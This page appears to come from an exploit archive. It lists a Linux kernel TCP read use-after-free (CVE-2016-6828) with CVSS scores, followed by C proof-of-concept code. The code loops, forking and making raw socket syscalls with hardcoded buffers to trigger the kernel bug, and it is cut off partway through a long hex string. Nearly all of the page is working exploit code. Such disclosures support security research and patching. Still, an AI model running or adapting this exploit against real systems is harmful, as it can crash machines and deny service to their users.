Lucene search

K
exploitpackMarco GrassiEXPLOITPACK:1FBD31E3DB245782B704F7FD19F38A9F
HistoryAug 18, 2016 - 12:00 a.m.

Linux Kernel - TCP Related Read Use-After-Free

2016-08-1800:00:00
Marco Grassi
21

5.5 Medium

CVSS3

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

4.9 Medium

CVSS2

Access Vector

LOCAL

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

COMPLETE

AV:L/AC:L/Au:N/C:N/I:N/A:C

Linux Kernel - TCP Related Read Use-After-Free

// Source: https://marcograss.github.io/security/linux/2016/08/18/cve-2016-6828-linux-kernel-tcp-uaf.html

// to build clang derp4.c -o derp4 -static

#include <unistd.h>
#include <sys/syscall.h>
#include <string.h>
#include <stdint.h>
#include <pthread.h>
#include <stdio.h>

#ifndef SYS_mmap
#define SYS_mmap 9
#endif
#ifndef SYS_socket
#define SYS_socket 41
#endif
#ifndef SYS_bind
#define SYS_bind 49
#endif
#ifndef SYS_sendto
#define SYS_sendto 44
#endif
#ifndef SYS_setsockopt
#define SYS_setsockopt 54
#endif
#ifndef SYS_dup
#define SYS_dup 32
#endif
#ifndef SYS_sendmsg
#define SYS_sendmsg 46
#endif
#ifndef SYS_recvfrom
#define SYS_recvfrom 45
#endif
#ifndef SYS_write
#define SYS_write 1
#endif

long r[62];


int main(int argc, char **argv)
{
    while (1) {
        pid_t pid = fork();

        if (pid == 0) {
        r[0] = syscall(SYS_mmap, 0x20000000ul, 0x20000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        r[1] = syscall(SYS_socket, 0xaul, 0x1ul, 0x0ul, 0, 0, 0);
        memcpy((void*)0x20006000, "\x0a\x00\xab\x12\xc7\x17\x1c\x83\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x05\x4f\xdc\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00", 128);
        r[3] = syscall(SYS_bind, r[1], 0x20006000ul, 0x80ul, 0, 0, 0);
        r[4] = syscall(SYS_mmap, 0x20020000ul, 0x1000ul, 0x3ul, 0x32ul, 0xfffffffffffffffful, 0x0ul);
        memcpy((void*)0x20012f5a, "\x25\xf9\x1b\xd4\xeb\xf5\x39\x3c\xd5\x80\xf6\xf0\xd6\xe1\xff\x65\x30\x97\xac\xaf\x1b\xbc\xc8\xae\xa4\x1e\xab\xd8\x60\x51\xcb\x4b\xed\xae\xaa\x37\xda\x80\xf9\x06\xb8\x6b\xdf\x78\x0f\xd0\x87\xf2\x65\x5f\x5e\x85\xb5\x4d\x6b\x48\xff\xf3\x0d\x46\x1c\xe5\xa4\x48\x38\x78\x18\x71\x9b\x75\xc4\xc9\x77\xf2\xc4\x5f\x88\x8e\xd2\x8d\x97\x26\x56\x4c\x93\x31\xbc\x64\x22\xff\xdc\x68\x01\x74\x43\xea\x84\x6f\x1d\x90\xeb\x98\x6c\xe9\x1c\x3b\x72\xab\xa0\xb5\x5b\xe8\xee\xfb\xf3\x2d\x96\xa0\xd4\x13\x55\xbc\xd4\xe0\x41\xfd\x78\x7e\x90\xf9\x9f\x9c\x57\x32\x47\xf2\xcf\x7f\x4a\x7b\x79\x0a\xdd\xb4\xce\xbd\x0b\x44\x02\x95\x0f\xaf\x50\xff\x87\x90\x09\xaa\x94\x01\x41\x43\x08\x8e\xb1", 165);
        memcpy((void*)0x20020000, "\x0a\x00\xab\x12\x0d\xf5\xba\x69\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xac\xad\xce\xa0", 28);
        r[7] = syscall(SYS_sendto, r[1], 0x20012f5aul, 0xa5ul, 0x249e4e54fe149d8cul, 0x20020000ul, 0x1cul);
        *(uint32_t*)0x20001fff = (uint32_t)0x2;
        r[9] = syscall(SYS_setsockopt, r[1], 0x1ul, 0x8ul, 0x20001ffful, 0x4ul, 0);
        r[10] = syscall(SYS_dup, r[1], 0, 0, 0, 0, 0);
        *(uint32_t*)0x20018000 = (uint32_t)0x4;
        r[12] = syscall(SYS_setsockopt, r[1], 0x29ul, 0xbul, 0x20018000ul, 0x4ul, 0);
        *(uint64_t*)0x2000dfc8 = (uint64_t)0x2000e000;
        *(uint32_t*)0x2000dfd0 = (uint32_t)0xc;
        *(uint64_t*)0x2000dfd8 = (uint64_t)0x20000000;
        *(uint64_t*)0x2000dfe0 = (uint64_t)0x1;
        *(uint64_t*)0x2000dfe8 = (uint64_t)0x0;
        *(uint64_t*)0x2000dff0 = (uint64_t)0x0;
        *(uint32_t*)0x2000dff8 = (uint32_t)0x4;
        *(uint16_t*)0x2000e000 = (uint16_t)0x0;
        *(uint16_t*)0x2000e002 = (uint16_t)0x0;
        *(uint32_t*)0x2000e004 = (uint32_t)0xffff;
        *(uint32_t*)0x2000e008 = (uint32_t)0x401;
        *(uint64_t*)0x20000000 = (uint64_t)0x2000ed3a;
        *(uint64_t*)0x20000008 = (uint64_t)0x37;
        *(uint32_t*)0x2000ed3a = (uint32_t)0x14;
        *(uint16_t*)0x2000ed3e = (uint16_t)0x2;
        *(uint16_t*)0x2000ed40 = (uint16_t)0x12;
        *(uint32_t*)0x2000ed42 = (uint32_t)0x1f;
        *(uint32_t*)0x2000ed46 = (uint32_t)0x7;
        *(uint8_t*)0x2000ed4a = (uint8_t)0x6;
        *(uint8_t*)0x2000ed4b = (uint8_t)0x100;
        *(uint8_t*)0x2000ed4c = (uint8_t)0x3f;
        *(uint32_t*)0x2000ed4d = (uint32_t)0x11;
        *(uint16_t*)0x2000ed51 = (uint16_t)0x0;
        *(uint16_t*)0x2000ed53 = (uint16_t)0x808;
        *(uint32_t*)0x2000ed55 = (uint32_t)0x1;
        *(uint32_t*)0x2000ed59 = (uint32_t)0x0;
        *(uint8_t*)0x2000ed5d = (uint8_t)0x0;
        *(uint32_t*)0x2000ed5e = (uint32_t)0x12;
        *(uint16_t*)0x2000ed62 = (uint16_t)0x2ea;
        *(uint16_t*)0x2000ed64 = (uint16_t)0x200;
        *(uint32_t*)0x2000ed66 = (uint32_t)0x5;
        *(uint32_t*)0x2000ed6a = (uint32_t)0xffffffffffffffff;
        *(uint8_t*)0x2000ed6e = (uint8_t)0x9;
        *(uint8_t*)0x2000ed6f = (uint8_t)0x1;
        r[47] = syscall(SYS_sendmsg, r[10], 0x2000dfc8ul, 0x801ul, 0, 0, 0);
        *(uint16_t*)0x20001003 = (uint16_t)0x1;
        *(uint8_t*)0x20001005 = (uint8_t)0x0;
        *(uint32_t*)0x20001007 = (uint32_t)0x9;
        r[51] = syscall(SYS_recvfrom, r[10], 0x20014a91ul, 0xdeul, 0x0ul, 0x20000ffbul, 0x8ul);
        memcpy((void*)0x20015285, "\xed\xe0\xf1\x03\xbd\x1d\xe2\x8d\x13\x62\xc9\x11\xde\x3b\x55\xb1\xb2\x26\x95\xb2\x3f\x32\x96\x8a\x3d\xf7\xd4\x2c\xd9\x32\xae\x05\x9a\x60\x09\xbc\x49\x63\x6a\x45\xd5\x6f\xa8\x4b\xaf\x8a\x66\xf3\x35\xad\xe6\x68\x85\xd4\x7e\xe5\x7c\x7e\x06\xbf\x32\xfb\xf9\xd2\x9f\x40\xa3\x0a\xa0\x93\x09\x73\x39\x7d\xac\x3c\x8d\x83\xe0\x0c\x5e\xa2\x36\x9b\x9c\xb4\x62\xe8\x39\x07\xd8\x71\xc1\x2f\x6f\x18\xfa\x8a\x5d\x06\xb4\x46\xa2\x97\x79\x81\xb2\x85\xd4\x4f\x6b\x48\xc4\xf5\xdd\xa8\x8d\x10\x74\x01\xe1\x58\xb2\x82\x72\xc4\xb6\xb2\xf7\xaa\x90\x9c\x9f\x61\x95\x87\x7b\x99\xc5\xa5\x53\xbc\xab\xdb\xdb\x5e\x32\xb8\xc3\xee\xd3\xda\x7a\xf2\x5c\xc5\x1a\xf1\xd6\x1b\x53\xad\x24\xd0\xa0\xc0\x0d\x73\x9e\x81\x7e\x4e\x82\xf5\xa9\x73\x3c\x7a\x5c\x6e\x4c\x48\x7d\x42\xf5\x2f\x68\xf9\x7e\xa9\xd8\x6a\x64\x78\x08\x7a\x37\xe9\xd3\x81\x15\x34\x63\x63\x14\xb7\x1a\x43\x9b\x4f\x85\xfa\x88\x5c\xe1\x1e\xce\x87\x95\xe1\x81\xc8\x06\xaf\x1a\x64\x26\x36\x83\x36\xef\x71\x0c\x2a\xda\xe4\xff\xa1\x87\xc2\x04\x96\x1c\x72\xd9\x2d\xf0\xce\x46\xd4\x3a\xd1\xc7\x2f\x60\x25\xf8\x33\x1f\x38\x7a\x46\xb1\x43\xa4\xd2\x65\x77\x47\x85\xe9\xad\x52\xdb\x8b\x93\x23\xf1\xf9\xa9\x5f\xe4\xf8\x39\x82\xc5\xb4\xe1\x5b\x87\xa0\xfd\x2c\xc2\x84\x15\x78\xaa\x9b\x3f\xe5\x75\x6e\x05\xef\x84\x4c\x6b\x9d\x1d\x9e\x7c\x92\x3b\x55\xcb\x01\x6f\xc5\x9a\xd8\xc3\x91\x39\x95\xd7\x8f\xe9\x87\x15\x27\xe7\x19\xa8\x18\x24\xfd\x09\x11\x49\x41\xc6\xd2\xe9\x1a\xf4\xb0\x9b\x85\x9b\x3f\xb1\xf3\xc3\x48\xc5\xe7\x45\x0b\x21\x2d\x32\x27\x92\x3c\x39\x52\x0f\x2b\xdf\x52\x66\x6f\x01\x8f\xdc\xfa\x8f\x5e\x53\xb7\x82\x23\x79\xfa\x28\xe5\x24\xa7\x5e\x2a\x24\x7e\xd0\x1e\xd5\x1a\xb6\xb8\xe5\xb2\x6d\x4d\x38\x61\x79\xb8\xd1\x27\x92\x63\x0c\xed\x3c\xf1\x13\x98\x37\xfa\x98\xda\x0c\x1a\x86\xd1\x6a\x12\x86\x2f\xd0\x8d\x8e\x2e\x52\x23\xac\x2d\x82\x59\xef\x17\xbc\xf1\x47\xfb\xf0\x5f\x43\x70\x99\x14\xdf\xaf\x44\x02\xb5\xe9\x39\x51\x8e\xf2\x07\x9c\xa2\x39\xab\x07\xa2\x22\xa7\xd3\x5c\xc0\x8c\xcf\x3c\xa2\xa7\xd0\xd6\xf4\x82\xcc\x35\x75\x3a\x20\xb7\x9b\xf3\x9d\xd9\xfe\xdf\x1e\x3f\x55\xf2\x99\xdb\xd0\xb2\xd7\x86\xc1\xfa\xb3\xc7\x99\xdc\x02\xe3\x9f\xfd\x1e\x56\xc1\xf2\x51\x32\x84\x61\x30\x33\xf6\xe3\x82\x9f\xf2\x04\xaf\x5d\xf4\x3d\xa6\x0e\x25\x53\xe9\x05\x7c\x42\xbf\xfa\x97\xd7\x77\x8c\x8f\x29\x7a\xcb\x40\x13\x07\xb5\x8d\x69\xdc\x8b\x35\xd3\xb6\xf3\xd8\x07\x94\x7e\x69\x0f\xb7\x28\xf1\xb3\x45\x60\x37\x65\xa4\xf6\xbf\x9c\xb3\xf9\x3d\xe1\x08\x08\xc9\x76\x5e\x8b\x7f\x26\x01\x9d\x8f\x15\x39\x02\xfe\x8a\xe3\x3b\x8b\xf9\xae\x06\x04\xef\x0d\xcf\x67\x24\x54\xe6\x4c\xe4\x05\x8e\xd7\xda\x4c\xf2\xd7\x88\x75\x87\xf7\x7e\xd0\x49\x19\x02\x5e\x00\xc4\xeb\x3e\xec\x70\x35\x9c\x9b\xc9\xd9\x47\x65\x4c\xa3\xdb\x0e\xde\x1e\x76\x58\x27\xe0\x91\x6b\xf9\x25\x44\xa6\xa2\x85\x8f\x50\xd0\x13\x88\x57\x25\x56\x78\xed\xcb\x6b\xec\xf2\x4f\xd4\xce\xf1\x90\xcd\x49\x50\xb5\xcf\xd3\x96\x4d\x3c\xf4\x54\x8e\xa9\xdb\xd3\xb5\x9e\xe9\x87\x19\x8b\x59\xd7\xf2\xcf\x1a\xd3\x70\xca\x42\xc6\x97\x66\x38\x24\x39\x4d\x42\xa1\xf0\x24\x46\xe4\x0e\x9c\xbc\xc4\x53\xa9\xb9\x94\x4d\xca\x48\xa6\x04\xb8\x2f\x4f\xf5\x85\x32\x22\xf8\x4e\x83\xab\x34\x27\x3b\x8f\x24\x48\x15\x9b\xa9\xf8\xb9\xb7\xcb\xd5\xfb\x72\xec\x7a\xc3\x39\x9c\xde\x25\x76\x08\x3f\x49\x35\xbd\x42\x4f\x3f\x5e\xfc\x6b\x6b\x9e\x3e\x34\x47\x62\xed\x5a\xae\xdc\xcf\x4e\xe6\x18\xfa\x7f\xe6\x46\xc8\xbe\xbc\x42\x88\xb6\xfe\xbd\x96\x85\x5a\x4a\x1d\xd2\x00\xe9\x71\x48\x48\x52\xd6\xf5\x88\x7d\x94\x18\xf6\xf0\x5c\x0a\x39\x29\xc8\x78\xa0\xa8\x44\xf4\xb6\xca\x78\x75\x4a\xf7\x53\xd7\x7e\x23\xaf\x6b\xf9\xcd\x77\xb2\xd0\x37\x29\x9c\x57\xbe\x9e\x5f\x7c\xe4\x41\x59\xde\xd5\x63\x02\x2a\xc0\x74\xa6\x00\xe2\x8f\x83\x30\xc1\x60\xcd\xb3\xca\x44\x1d\x88\x54\x8b\xbc\xa8\x79\x78\x86\xa2\x49\x7c\x94\x49\xf3\xb4\x41\x44\x76\x33\xf1\x2e\x71\xbc\xa1\x39\xb9\x68\x56\xd9\xa0\xa1\x6f\xdc\x7d\xa3\xb8\x4f\x1c\xb8\x19\x26\x42\x88\x0e\xcb\xbb\xc9\x6c\xa8\xf8\xe9\x37\x86\x61\x37\x9f\xba\xb3\x9e\x54\x07\xe6\xff\x6f\x54\x8c\xcf\x7e\x3d\x14\xfd\x94\xbb\xdc\x59\x5d\x22\x86\xb5\x3b\x18\x0d\x08\xad\x15\x67\x6b\xf1\xc8\xd8\x81\xac\x14\x63\xcf\x1e\xf9\x48\xba\xe0\x33\x4c\x1e\x72\xe9\x00\x1a\x48\xc5\xb4\x2c\x71\xd6\x7a\x0b\x8f\x6c\x02\x9a\x02\xa9\x20\xbd\x8a\x56\xe1\x59\x92\x1f\x5f\xea\x61\x1b\xe3\x2f\xc0\x15\x9c\x3e\xcf\xe7\x05\xbc\x7e\xe8\x88\x58\x63\x29\xc5\x10\x26\xf0\xbc\xf5\xcd\x3d\x33\xfa\x87\x45\x25\x1d\x86\xc0\xd8\x72\xdc\x1b\xaf\xa1\xf3\x1e\x81\xb4\x7b\x4d\xb5\x79\x72\x87\x92\x1f\x9d\xa1\x8e\x1a\x24\x7f\x49\x11\xc4\x59\xa5\x8e\x6c\x7a\xdd\x17\x52\x47\x3b\x09\x28\xe4\x3b\xef\xb0\xf3\x68\x9c\xd3\x6e\xe9\x89\x38\xdb\xeb\x01\x4f\x39\x9b\x5b\x0c\x8d\x92\xcd\x5c\x15\x47\x15\xa9\x98\x70\x75\xe2\xf0\x5b\xfe\xaa\xa9\xb3\xba\xc9\x8e\x5c\x6d\xfb\x53\xb9\x8b\x4f\x7e\x31\xbe\x69\x7e\x6d\x80\x6f\x3e\xd8\x59\x1c\x13\x5a\x3b\x2b\x0e\xc6\xd1\xf9\xaa\xf1\x30\x16\xf1\x7b\x2f\x6b\x5f\xa9\xde\xfa\xfd\x59\xaa\xdd\x32\xf7\xbb\x94\x28\x93\x16\xb3\x60\xd5\x6c\x62\x93\xba\xa9\xaa\x38\x52\xdc\x2f\x37\x75\x1d\x56\xa9\x3c\x7c\x8b\x0d\x56\x9e\x05\xf7\xa1\xa6\xef\x3c\x76\x6e\x06\x06\xde\x07\x84\xa0\xeb\xeb\x8e\x46\x2f\xd9\xc2\x56\xc6\x89\x85\x8c\x39\xad\xa2\x77\x24\xe5\xb5\x00\x04\x4c\xf5\x1e\x4a\x03\x06\xbb\xa1\x1f\xe7\xf8\xb7\x3e\xdd\xfc\x18\xbf\x13\x07\x14\xdd\x8a\x6b\x0f\x44\xc0\xeb\x4a\x43\x7d\x42\xe9\x02\x63\xb5\xc2\x7a\x87\xce\x14\x0c\xaf\xd9\x2b\xaf\x4b\x22\xec\xa9\x3b\x16\xeb\xb7\xc5\x0d\x51\x91\x93\x5d\x90\xe1\x8f\x34\x86\x71\xe0\x7c\xb5\x1e\xe7\x19\xc0\xd6\xc9\x3e\x08\x75\xc0\x1f\xab\x5e\x41\xbf\x0e\x1a\x14\xcc\x40\xf6\x85\x02\xba\x3d\x78\xce\xf7\x6f\x0e\xbf\x51\xda\xc6\xa1\x59\xbd\x69\x1a\x05\x7b\x34\xbd\xa7\x28\x39\xa1\xa2\x18\xa7\x76\x8f\x51\xa5\xd2\xdc\xf4\xa7\x7b\xc8\x64\x0e\xc0\xe8\xac\xc3\xd4\xb9\x11\x78\x58\x79\xe4\x91\xc9\xcf\xe2\x0c\xbb\x11\xb3\x80\x48\xd7\xa5\xbd\x45\xdd\xb6\xad\x87\x79\x01\xa0\xe1\x89\xdb\x54\x42\x1c\x78\x47\x91\x07\xe8\xbc\x26\x15\xf2\xdb\xba\x5b\xaa\x5a\x05\x84\xa2\x83\x7d\xe5\xbb\x5a\x77\x3f\x0a\x27\x06\x4e\x86\x69\x95\x27\x22\x7e\xa2\x42\x4d\x61\xa7\xab\x6d\x05\x8b\x7b\x6b\x94\xd6\x10\x40\x66\x30\x0b\x6c\x79\xe1\x62\xee\x33\xed\xd6\xd4\x9a\x3a\xea\x95\x5b\x60\x70\x58\xc9\xc6\x6c\x47\xa7\xd1\xcc\xfa\x9f\xc7\x66\xac\xbb\x4f\xe4\x09\x74\xe3\xd1\xeb\x82\x3b\xce\x4c\x2b\xcf\x08\xcd\xf6\x96\x2b\x65\x2a\x2c\x33\xf5\x7b\x66\xdb\xec\x3d\xbf\x24\xf7\xf9\x87\x99\x26\x1b\x5a\xa0\xd0\x0e\x2f\xc0\x2e\x03\xcd\xf4\x1e\x10\x7c\xb5\xb7\xec\x75\x2c\x20\x89\xc4\xec\x61\x34\x3b\x6c\x68\x14\x95\xd9\x9a\x03\xd7\xf2\x6b\xe6\x50\x14\x80\x72\xa2\x67\xaf\xb3\x19\x12\xcc\xf9\x9d\x3d\x34\x86\x48\xe7\xa6\xe7\xc0\x9b\x6c\xeb\x2c\x0d\x26\x6f\x09\xd9\x8c\x92\x8e\xde\x80\x04\x14\xe6\x88\xbb\x39\x2f\x2c\x14\xf2\xda\x86\xdb\x10\x59\x54\x83\xe6\x5e\xe3\x14\x4b\x73\x97\x9a\x94\xa8\x09\x44\x1d\xd0\x62\x2d\x43\xb4\x5e\x38\xaa\x8e\x5b\xdd\x2f\xd3\x2c\x8e\xd3\xd0\x0f\x9d\x80\xca\x87\x4e\xab\x52\x01\x29\xb7\xe7\x55\xa2\xe4\x2d\xee\xce\x30\xe9\xcb\xc4\x3e\xf9\x58\x04\x63\x01\xec\x89\x33\x01\x26\x7d\xe2\x5d\x41\xf7\x91\xa3\xcb\x41\x62\xb4\x82\x6d\xb9\xd1\xad\xf2\x96\x0f\xad\x87\xbe\x6d\x95\xaf\xc2\x14\x12\x78\x10\x90\x86\x61\x55\x97\x77\x5c\x19\xfe\x4e\xda\xf3\x74\x08\x83\x4d\xa0\x25\x04\x05\x4b\xf3\x30\xc1\x2f\xb6\x16\x2d\x9b\x2c\x7d\x90\x5a\xd2\x28\x53\xc5\x3a\x14\x8c\x1f\xda\xd7\x36\x47\xdc\x85\x7f\x2b\xe8\x0d\xf9\x03\x92\xba\x82\x20\xde\xb3\x65\x14\xe8\xdd\xfe\x6b\x3a\xab\xd5\xad\x03\xcb\x4f\x41\x08\x97\x22\xe7\xc7\x1d\x0e\x7c\x8e\x4d\x12\x2c\x86\x8b\xb3\x31\x43\x5f\x6e\x37\xcf\x08\x83\x4d\x16\xd7\x3f\x4a\x80\x2b\x67\x1a\xbb\xaf\x8d\x1c\x1c\x5d\x00\x33\xf3\x67\x13\x43\xf1\x09\x00\x81\x68\xe1\x33\xb1\xb4\xc1\xad\xd9\x99\x0c\xac\x4f\x09\x26\xd7\xff\xc8\xcd\xfd\xe9\x32\x52\xd1\x4c\xee\x61\x89\xe0\x82\x64\xa3\x6b\xeb\x23\x87\xc8\xed\x94\xa6\x6b\x68\xec\x13\x59\xa7\x74\x06\x7d\xac\x6f\xfd\xf5\x3d\x3b\x9d\x8b\xe1\x22\x98\xf3\x0e\xbd\x3f\xfa\xbe\xb9\x86\x3d\xe4\x1f\x30\xd4\x96\x6f\x7f\xd4\x48\xbc\xc9\x8b\x1e\x8f\x63\xa1\xb4\xa9\x43\xf2\xb8\x28\x5e\x57\x93\xc5\x56\x21\x12\x20\xd5\x16\x29\x14\xb0\xff\x42\xba\x0e\x26\x6e\xcd\x7e\x7c\x72\x27\xfb\xd2\x0f\xac\xdb\x0d\xc8\xc8\xd6\xa0\xc7\x5b\xfd\x0c\xd7\x89\xe8\x8b\xee\x24\x0f\xd1\x78\x23\x82\xe7\xb5\x7f\x63\xb3\x14\x10\x78\x26\x23\xd3\x60\xbd\x53\x5a\x1b\x67\x0f\xcf\xd5\xfe\x90\x18\xa9\xd6\x80\xc3\x94\x00\x21\x6d\xdb\xab\x09\x38\x0d\x77\xdc\x3e\x90\x2f\x3c\x0e\x06\x6b\xaf\x14\x45\xcc\x0d\xcb\x1b\x74\xdc\x01\xec\x29\x23\x96\xe0\x2a\x86\xee\x92\x9c\x86\x10\x9f\x3d\x7a\x56\xf3\x6f\x3b\xef\x2b\x84\xd5\xcf\xd3\xf7\x2b\xa6\x0d\x9c\xa2\xb0\x42\x8f\xed\x53\x99\x7a\x11\x64\x5e\x53\x92\xb7\x97\x20\xaa\x25\xc2\x5d\x6b\xbd\xde\x58\xe7\x51\xc2\xd5\xa5\xe0\x9b\xbf\xe4\x81\x1c\xd5\xc4\xee\x29\xfa\xd2\xbb\xce\xbf\xfe\x40\xee\x09\xf5\x4b\xb2\x1e\x33\xef\x8f\xf9\x05\x68\x15\x7a\x45\xa0\x52\x3c\x29\xf4\x01\xf2\x64\x98\x2d\xbd\x89\xae\x86\x80\xd9\x0a\xfe\xca\x86\x46\xc3\x58\xd6\x1d\x54\xd4\x6f\x36\xe0\x32\x6a\x23\x29\xbd\x69\x22\x9b\x1e\x7f\x01\x28\xff\xc0\x1c\x8f\x01\x08\xa4\x96\xda\xfe\x96\xab\xf2\x23\x34\x34\xb0\x46\x38\xd6\x2f\x87\x62\xcf\x96\x85\xbb\xcc\x98\x27\xfc\x91\xea\xd9\x78\xc4\xcb\x42\xc0\xd3\x7d\x90\x1c\xfa\x62\xa8\xb7\xf3\x31\x04\x56\xa1\x97\xe1\xa8\xfc\xab\x90\x64\x01\x81\xae\x20\x05\x2f\x91\xaf\x27\xb9\xb5\x12\xce\x94\xa6\x6b\x32\xf2\xd0\x0b\xf5\x71\xff\xbb\xd8\xe1\x20\x5f\x0d\xbe\x90\x44\xe4\xa5\xb5\xf6\xa3\x70\x5b\xd3\x24\xa2\xb6\xba\x22\xd7\x27\x47\xff\xff\x79\x65\xf1\x82\xcf\x51\x56\xa6\x6f\x48\x32\x66\x7b\x3f\x3f\x7c\xb8\x6f\x0f\x2d\xe8\x92\x72\x86\xc4\x9e\x6f\xe7\xb6\x3f\xb6\x6f\x96\xdc\x68\x8d\x1d\x1c\xfe\x3f\x23\x45\x7d\x35\xed\x3d\x6a\x06\xe8\x4b\x7f\xb1\xe6\x2b\x66\x4a\x53\x45\xa4\x5c\x77\x96\x25\x4a\x13\x3a\xf3\xbe\x7e\x16\xb0\x51\x84\x53\xe6\x4e\x37\xd7\xc1\xee\xda\xfb\x18\xb0\x81\x3b\x16\xfc\xea\x32\x00\x75\x97\x1a\xc9\xf9\x5a\x44\x1a\x12\x08\xcb\xbe\x60\x79\x80\x60\xcd\xbd\x5b\x60\x9b\xfc\x31\x5b\xca\xa5\xda\x16\x18\x45\x95\xe1\x5b\xd4\x4c\xdc\xc9\x10\x73\x14\xbb\x0b\x9c\xdb\x0c\x0c\x8c\x3b\x42\x29\xf4\x7d\x93\x61\x5a\x6a\x6b\xac\xae\x80\x60\x5d\xd1\x3e\xe4\x6d\xf7\x3f\xb8\x7b\x7f\x35\x1b\x67\xd3\x60\x80\x0a\x08\x25\xff\xbb\x31\x47\x60\xb3\xd1\x0e\xce\xbc\xf3\x88\xe0\x56\x5e\x61\x97\x63\x82\xa4\xff\xea\xf9\x48\x7f\x4c\x62\x58\x46\x30\xe5\x2c\xbe\xa0\x18\xe4\xe8\xf6\x4f\x22\x5b\x1d\x18\xb0\x48\x0c\xe7\x25\xa9\x1a\x8e\x5a\x3f\xbd\x4c\xab\xe7\x52\x29\xa2\x35\x77\xf5\x0c\x8c\x4e\x2d\xa9\x16\x11\x00\xdf\x8b\xe1\x7f\x8f\x20\x9d\xe9\xea\x2b\x4e\xf4\xe5\x98\x4e\xf8\xe9\x5b\x98\xb9\x2a\xb8\x68\x0d\xdb\x35\xf8\xfd\x5d\x28\x14\x2a\x65\x33\x3d\xde\x77\xc5\x73\xee\xc4\xa4\x8e\x76\x12\x4f\x28\x93\x7d\xd8\xf5\xbf\x32\x39\xe1\xc1\xaa\x46\x71\x9f\xcb\xa4\x93\xa5\xae\xe0\xb1\x9f\x03\xb3\xbe\x86\xf9\x92\x45\x65\x64\x8d\xd9\x49\x09\xd2\x0c\x01\x92\x75\x1a\x29\x43\x34\x74\x21\x6d\xa6\x0e\xa7\x3b\x15\x2c\x59\xc2\xb9\x8a\x92\xcb\xc3\x8c\xc7\x06\xfd\xfc\xe1\x67\xc7\xc5\xc6\x07\x24\xc8\x06\xa7\xdc\x76\x83\x43\xec\x90\x3b\x6f\xa0\x00\x9a\x68\x44\x71\x19\xbe\xdb\x24\xb0\xcb\x9b\x8a\x28\xb6\x30\x99\x79\xd2\x42\xbe\x53\x32\x84\x0c\x17\xdc\xc9\x1c\xa9\xed\x26\x20\x69\xef\x6d\xc4\xa4\xad\xe5\x68\xec\x52\xe8\x51\x3f\xb2\x52\xbc\x6f\x84\x26\x41\xf9\x91\x22\x66\x89\xcc\x03\xa6\xa5\x7a\x07\xd7\x35\x92\x5e\xc1\xf9\x11\x1b\x4b\x6d\x50\x7b\x4f\x43\xca\x13\x37\xd2\x6d\xce\x81\xa8\x9b\x8b\x8c\x65\x75\x08\x97\x18\xb6\xd2\x2e\xd2\xe3\x31\x51\x2e\xb0\xb3\x04\x64\x71\xba\x05\x4b\x23\x91\x92\xfd\x4a\x1b\x6c\x35\xa5\x8f\xcb\xb5\xac\xd9\x40\xe5\x4b\x6b\x04\xe2\x2a\xab\xd9\x0d\xcf\x0b\x23\xfa\x1f\xcd\x4a\x46\xb0\x26\xc4\xb8\xae\x17\x82\x6c\x7f\x6f\xe6\x1a\x8c\x0d\x95\xdf\xe2\xc2\xd4\x5c\x85\x6d\x79\x3b\x8a\x6c\x51\xf3\x5f\x06\xdf\x07\x5b\x69\x8a\xde\x75\x59\x6d\x70\x99\x55\x09\x8f\xf8\xc0\x6f\x2e\xc3\x0f\x87\x1c\x79\xe8\x4b\xb0\x55\x51\xb2\xa3\x91\x9b\xb0\x89\x17\xad\x9b\x89\x81\x23\x12\xcb\x45\x8a\xd7\x2a\x0a\x19\x84\x7d\xb9\x64\xa6\x31\xa3\x48\x30\x3c\x01\x6b\x7c\x74\x20\xe6\x0b\xff\x2a\x0a\x66\x82\x00\x31\x01\xbc\xf8\x47\x02\xcc\x43\xbe\x6d\x0c\x0e\x4f\x59\x37\x4d\xcb\xc2\x37\xee\x5e\x1c\x2c\xf3\xda\xc8\xf8\xc9\x8c\xbc\xff\xd9\x8b\x8a\xee\x4e\xab\x19\x8f\xb6\xb4\xe7\x0a\xda\x9c\x5c\x00\xc3\x26\x87\x63\xb0\xa9\x1b\x31\x62\xef\x04\x10\x68\x6c\x3c\xd1\xba\x73\xc1\xaa\xf2\xe4\xbd\x29\xdb\x2c\xe3\x69\xf0\x34\x8d\xd3\x6b\x6e\x59\x42\x6f\x28\x3d\x2f\x83\x27\x48\xc0\xb7\x82\xd3\x95\x96\x0c\xdf\x22\xc7\xce\x77\xab\x09\x4c\xad\xab\x0d\x70\xee\x4d\xea\xb3\x63\x62\x04\x6f\xd7\x68\x2e\x86\x7c\xac\xd4\xc2\x6e\x09\xdf\xf0\xbe\x8c\x71\xd9\xa8\x82\xf8\xd2\x14\x70\xb7\xd0\x40\x12\x5e\xa7\xec\xab\x1a\x13\x87\x0b\x6e\x28\x59\x76\x01\xb2\x3f\x64\x62\x35\xb3\xff\x0d\x8a\x3d\x6b\x5a\xd3\x9e\x59\x14\x6d\x19\x4c\x99\x04\x75\xe4\x04\xe3\xf2\x8a\x19\x77\x06\xdd\x5f\x2e\x25\x2c\xa3\xb5\x52\xa6\xfa\x2b\x84\x35\xdc\x56\x55\x02\x63\x79\x81\x3b\x27\x82\x41\x92\x19\xb3\xe3\x63\xce\xb5\x0c\x1a\x15\x15\x38\x2a\x52\xf0\xdd\x58\x3d\xa4\x7f\x5b\xb9\xa3\x9c\x90\x14\xf9\x2c\x2b\xaa\x1e\x0d\xfd\xf6\x93\x7e\xbc\xc3\x59\x11\x6e\xd9\x52\x1